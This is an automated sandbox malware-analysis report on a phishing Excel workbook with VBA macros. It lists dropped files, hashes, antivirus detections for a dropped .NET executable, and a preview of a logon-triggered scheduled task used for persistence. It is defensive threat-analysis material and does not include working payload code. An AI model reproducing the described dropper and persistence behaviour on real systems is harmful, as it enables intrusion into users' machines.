                                    Encrypted:false
                                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtgVxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTuv
                                    MD5:D65DB3334B2047129605315CA2689F10
                                    SHA1:A03FC3E30FEB5E27D46A995490F85B633CF46EAA
                                    SHA-256:AF3CF1955536B119996F6B44A630877B7BBA6468CBFBCDE6BE4D303DD9707214
                                    SHA-512:9A197FDEFCA1734AB22AD0DD5F9E5E0F574BDFD998C3405A6FD97B14289ED41EE2A518FE4FFBEBB53DAD7B44EDE67979397F408A611B22C9D4288F0846D4E326
                                    Malicious:true
                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                    Process:C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    File Type:XML 1.0 document, ASCII text
                                    Category:dropped
                                    Size (bytes):1574
                                    Entropy (8bit):5.113897866737485
                                    Encrypted:false
                                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtgVxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTuv
                                    MD5:D65DB3334B2047129605315CA2689F10
                                    SHA1:A03FC3E30FEB5E27D46A995490F85B633CF46EAA
                                    SHA-256:AF3CF1955536B119996F6B44A630877B7BBA6468CBFBCDE6BE4D303DD9707214
                                    SHA-512:9A197FDEFCA1734AB22AD0DD5F9E5E0F574BDFD998C3405A6FD97B14289ED41EE2A518FE4FFBEBB53DAD7B44EDE67979397F408A611B22C9D4288F0846D4E326
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Preview:1
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Preview:1
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):73728
                                    Entropy (8bit):6.1914492469448605
                                    Encrypted:false
                                    SSDEEP:768:BxD0zvx6+Lew/BKAoaqDO4T7urYN22Hy/picjOu1CukVIWluoozagoM40TtOZSw3:BI1CT8QmtTQvWFsmBBg6uIu5
                                    MD5:FA1EB15E4D89C88CE60ACA84A7BD81B8
                                    SHA1:0CEDB34DE04B82179CE806837F4557D315A70804
                                    SHA-256:D85436BFE077C4B09F25CB603774613717152C6D377F7DB20822971181E9D099
                                    SHA-512:E20FB20C84D4CAB623218B9F423162B3EF7BC531CED38ABC492C24D9000F7A84D7B1DBFA2C66264FA0CDCB01A5721FD6DD5F7C23CABA13FE40FAE65A3CF70322
                                    Malicious:false
                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):10240
                                    Entropy (8bit):0.6739662216458647
                                    Encrypted:false
                                    SSDEEP:12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R
                                    MD5:C61F99FE7BEE945FC31B62121BE075CD
                                    SHA1:083BBD0568633FECB8984002EB4FE8FA08E17DD9
                                    SHA-256:1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
                                    SHA-512:46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9
                                    Malicious:false
                                    Preview: ....+..F..N..F).~]............\.">.. .......p.J..} /o...rLj-...FS..'x.o..%^ .....zr/..3.y.e4...MM.4..x9.f.D..{..(....'p......9...Qn..d..+.....H..M.)..........].....n-.]........n&.*.H`.sz...r.....1B.....e.."...A.....,-....n..$.<....CO..VO..P..'.......<......n....&5s....z..$.{'IM-.o..(#N.-..(H...a&...y.S..`8.(./...1.P.. .....K.3.......I!]G....@N........F.l.T=.0...`"..L....B...B`nI.<.....&F..2J2....1..Rs....h.Zq.`...t..CJ....@.....I.G.e..k..H.....F..G:..6.G.l=.Y......:...C.........?[.ts...=....;.|...q...@....s................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):24152
                                    Entropy (8bit):0.7532185028349225
                                    Encrypted:false
                                    SSDEEP:48:CMnfnO4FGtsFqN6t8nlztZKR6axR6uiozVb:ZnfO4kWKpZKdxR35
                                    MD5:520FE964934AF1AB0CEBA2366830D0FA
                                    SHA1:B90310ACA870261CB619FDFD1E54E1B1A25074FF
                                    SHA-256:DBD45EEA386D364B30BA189E079BFA05C2C40D9E5E83722C39A171998ED079C1
                                    SHA-512:A4839A6AB8DB522D9121A590B8C711E8C4F172D9CB71C918860F8048472920F3341B7BA624DFF514BE397809149E4471B2DF981DC81FE77C26B2DDF342A42F8C
                                    Malicious:false
                                    Preview: ...W....K.h.E..g..0...!1sm.[t\......A......5_...N{Yf?.w..[.Y..A...a^..(._.=.......:.v.$*.....e...F....f.qo.]...B1{.8.%%..,...;.|..<....g ....l.7.`ny.h.n.y...~Y.../.. .WZ.'......AI.|.._K}-$.i..<(.7Y...U....T.i.N.'Pt..c.[........<zni.::. 8W.<S...8!.Wh..;T.?.^yf...E?...pQ....i.;>/..^...r.YsncP..@.. .[".^..A.|.0..$<bC.G........~];..D.|.v.B.).g.E5.?... .N...}....i.,5..a.Fk.%.u.`..F...;xlw.}.5.Jt..c.5.....v...~)..8b|.*.B.]-]jk....PQZ..T}..M.S...88......?.*$..]..%V..D.<.5.d...[..Z.....2........%.$E..+sb.......*...g...>Q[l.}......@=..5L..._....Pi..HY.<[..l...H....9.\=u.v.....S8-&...,5..}t......m...*..R.W.G.NZ....w.....{.iA......G.f.TN.zk..(....q).....n....3..C...d./..........................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):70
                                    Entropy (8bit):4.068998595735082
                                    Encrypted:false
                                    SSDEEP:3:X6WLuYLOlSSXU6AcOIC6uXn:qFYLWSSxA0vuXn
                                    MD5:1E1530DA89DEF993A204363238CE1B48
                                    SHA1:EF1329A77EE8DFE02B84AF1CB619B17F9E9A40B8
                                    SHA-256:F6B9B0E3C207CA7D10BB746508DE53575D01A781CDC6C1AA23392C7BA4F24E40
                                    SHA-512:C7ABC0723B92D9A9EB00F533E0DA1D3FF1E19BDCEFCDDCCDB41DB41A3538C1B71C35A9A2B07E74F3CBD1ADEA8B2C6A6CF22224CABFE46BE4E6931B251696BB75
                                    Malicious:false
                                    Preview:short_3115571.1.exi.link/.9728.509122048.31124912.98903914.31124910.*.
                                    Process:C:\Users\user\AppData\Roaming\sihost.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):786432
                                    Entropy (8bit):7.843829192750069
                                    Encrypted:false
                                    SSDEEP:12288:ClQAuzVwg6o8jReYXggj/mkYfUu3lu/mMDtXWwQS/alvl7s66nIEAvhgquWfaOrJ:g53voIeauFcoymiXW485s66n+vhgk
                                    MD5:D02CC222E09FD373FAF4030AC735618C
                                    SHA1:9D56352E325A466837CA7C0657697F1C00E4D440
                                    SHA-256:A21299AF73C18F0D903F023BB82D10796F876335281059355EA3B8D72DDB1DD8
                                    SHA-512:FD475E9E20B03ECE2D0211092A86B3FC1D286E336CCE3354AE400B53DD77B82B3511E8742AB4F36F99C106ADC7A288029FDD113460652924D591A0CF7E56C8ED
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 42%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....V.f................................. ........@.. .......................`............@.....................................S.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H............,...........................................................0..A....... P........%.....(......... B........%.1...(.....2...(....*.....&*....~....*........*.~....*........*".(.....*....0..{.............%.....(.................. ....... c,..... .:..... .6..... 5...... .6..... . ..... ......................(....*.....&*..0..........~2.....~........E........................~....:......$...Y.+......(....%.(.........E....'.......!...'...=...L...~....-...P.....Y..+....v
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):786432
                                    Entropy (8bit):7.843829192750069
                                    Encrypted:false
                                    SSDEEP:12288:ClQAuzVwg6o8jReYXggj/mkYfUu3lu/mMDtXWwQS/alvl7s66nIEAvhgquWfaOrJ:g53voIeauFcoymiXW485s66n+vhgk
                                    MD5:D02CC222E09FD373FAF4030AC735618C
                                    SHA1:9D56352E325A466837CA7C0657697F1C00E4D440
                                    SHA-256:A21299AF73C18F0D903F023BB82D10796F876335281059355EA3B8D72DDB1DD8
                                    SHA-512:FD475E9E20B03ECE2D0211092A86B3FC1D286E336CCE3354AE400B53DD77B82B3511E8742AB4F36F99C106ADC7A288029FDD113460652924D591A0CF7E56C8ED
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 42%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....V.f................................. ........@.. .......................`............@.....................................S.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H............,...........................................................0..A....... P........%.....(......... B........%.1...(.....2...(....*.....&*....~....*........*.~....*........*".(.....*....0..{.............%.....(.................. ....... c,..... .:..... .6..... 5...... .6..... . ..... ......................(....*.....&*..0..........~2.....~........E........................~....:......$...Y.+......(....%.(.........E....'.......!...'...=...L...~....-...P.....Y..+....v
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Aug 13 19:24:47 2024, Security: 1
                                    Category:dropped
                                    Size (bytes):441344
                                    Entropy (8bit):7.950004788706853
                                    Encrypted:false
                                    SSDEEP:6144:rR1QxrZVcu9Tm20xv1jaZ0VWi88Giyvt+bJK3ICGSGgRhsqcxZsCcnO:rRUrvjgN1eZ0VWi88GLvtAPCdBv/
                                    MD5:558C36CA3B05B90F86C9F5BFC6EC64B3
                                    SHA1:020C5810C1C31148F33A5E5F56F62E9CE09BDBBE
                                    SHA-256:6339F2EE1C034AB57BA3F6788FA1584F7CEC8B2B9EEA6E4479C392EEE459861D
                                    SHA-512:C08743C4E9BE40B8353DB1B6AFCC0D5585C6F71B1904BA79AFF4C8881FEC0145B4F868F6F12E8191C9074163B944AC989700204001C4DFCB2D9FC8AAEE18F3F3
                                    Malicious:false
                                    Preview:......................>.......................................................j.......o.......q.......................................................................................................................................................................................................................................................................................................................................................................................................................................i................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h.......\.......l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Aug 13 19:24:47 2024, Security: 1
                                    Category:dropped
                                    Size (bytes):441344
                                    Entropy (8bit):7.950004788706853
                                    Encrypted:false
                                    SSDEEP:6144:rR1QxrZVcu9Tm20xv1jaZ0VWi88Giyvt+bJK3ICGSGgRhsqcxZsCcnO:rRUrvjgN1eZ0VWi88GLvtAPCdBv/
                                    MD5:558C36CA3B05B90F86C9F5BFC6EC64B3
                                    SHA1:020C5810C1C31148F33A5E5F56F62E9CE09BDBBE
                                    SHA-256:6339F2EE1C034AB57BA3F6788FA1584F7CEC8B2B9EEA6E4479C392EEE459861D
                                    SHA-512:C08743C4E9BE40B8353DB1B6AFCC0D5585C6F71B1904BA79AFF4C8881FEC0145B4F868F6F12E8191C9074163B944AC989700204001C4DFCB2D9FC8AAEE18F3F3
                                    Malicious:false
                                    Preview:......................>.......................................................j.......o.......q.......................................................................................................................................................................................................................................................................................................................................................................................................................................i................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h.......\.......l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:modified
                                    Size (bytes):165
                                    Entropy (8bit):1.4377382811115937
                                    Encrypted:false
                                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                    MD5:797869BB881CFBCDAC2064F92B26E46F
                                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                    Malicious:true
                                    Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Aug 13 16:08:47 2024, Security: 1
                                    Entropy (8bit):7.920284951271973
                                    TrID:
                                    • Microsoft Excel sheet (30009/1) 47.99%
                                    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                    File name:SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx
                                    File size:455'680 bytes
                                    MD5:d35618eec168e30e2a2df672f612388c
                                    SHA1:7637c3d56066f932e38de4918c5a3756791491e2
                                    SHA256:bd980fb1f921bf16d88b62d519ed6adb057ffc3c93532fca6465fac9e7074123
                                    SHA512:3aaa97a746fa07f647069b60057eb6000562c0166e2e954b17e82340ccbf959a8f4c51048b88ce60e69463df99c2038496cf840e1af8cd99c97e2c4ccdbe8995
                                    SSDEEP:6144:x41QZrZljw9D6J3RIBp42wzf7Sy+NwHEym0J6tdkq6fPnXg79Se8mdj+:x4YrnYbe2wjv+NwHJetufg70e8k+
                                    TLSH:20A40224F4D9CD4EE483E63A85E9741A0A4CFD2787CCE84B2468B70E9535BE1E753287
                                    File Content Preview:........................>.......................................................j.......o.......q..............................................................................................................................................................
                                    Icon Hash:2562ab89a7b7bfbf
                                    Document Type:OLE
                                    Number of OLE Files:1
                                    Has Summary Info:
                                    Application Name:Microsoft Excel
                                    Encrypted Document:True
                                    Contains Word Document Stream:False
                                    Contains Workbook/Book Stream:True
                                    Contains PowerPoint Document Stream:False
                                    Contains Visio Document Stream:False
                                    Contains ObjectPool Stream:False
                                    Flash Objects Count:0
                                    Contains VBA Macros:True
                                    Code Page:1252
                                    Author:
                                    Last Saved By:
                                    Create Time:2006-09-16 00:00:00
                                    Last Saved Time:2024-08-13 15:08:47
                                    Creating Application:Microsoft Excel
                                    Security:1
                                    Document Code Page:1252
                                    Thumbnail Scaling Desired:False
                                    Contains Dirty Links:False
                                    Shared Document:False
                                    Changed Hyperlinks:False
                                    Application Version:786432
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                    VBA File Name:Sheet1.cls
                                    Stream Size:977
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 0d 41 ea 06 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Attribute VB_Name = "Sheet1"
                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                    Attribute VB_GlobalNameSpace = False
                                    Attribute VB_Creatable = False
                                    Attribute VB_PredeclaredId = True
                                    Attribute VB_Exposed = True
                                    Attribute VB_TemplateDerived = False
                                    Attribute VB_Customizable = True
                                    

                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                    VBA File Name:Sheet2.cls
                                    Stream Size:977
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A f . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 0d 41 a3 66 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Attribute VB_Name = "Sheet2"
                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                    Attribute VB_GlobalNameSpace = False
                                    Attribute VB_Creatable = False
                                    Attribute VB_PredeclaredId = True
                                    Attribute VB_Exposed = True
                                    Attribute VB_TemplateDerived = False
                                    Attribute VB_Customizable = True
                                    

                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                    VBA File Name:Sheet3.cls
                                    Stream Size:977
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A } . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 0d 41 7d e1 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Attribute VB_Name = "Sheet3"
                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                    Attribute VB_GlobalNameSpace = False
                                    Attribute VB_Creatable = False
                                    Attribute VB_PredeclaredId = True
                                    Attribute VB_Exposed = True
                                    Attribute VB_TemplateDerived = False
                                    Attribute VB_Customizable = True
                                    

                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                    VBA File Name:ThisWorkbook.cls
                                    Stream Size:985
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . v . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 .
                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 0d 41 15 76 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Attribute VB_Name = "ThisWorkbook"
                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                    Attribute VB_GlobalNameSpace = False
                                    Attribute VB_Creatable = False
                                    Attribute VB_PredeclaredId = True
                                    Attribute VB_Exposed = True
                                    Attribute VB_TemplateDerived = False
                                    Attribute VB_Customizable = True
                                    

                                    General
                                    Stream Path:\x1CompObj
                                    CLSID:
                                    File Type:data
                                    Stream Size:114
                                    Entropy:4.25248375192737
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                    General
                                    Stream Path:\x5DocumentSummaryInformation
                                    CLSID:
                                    File Type:data
                                    Stream Size:244
                                    Entropy:2.889430592781307
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                    General
                                    Stream Path:\x5SummaryInformation
                                    CLSID:
                                    File Type:data
                                    Stream Size:200
                                    Entropy:3.2920681057018664
                                    Base64 Encoded:False
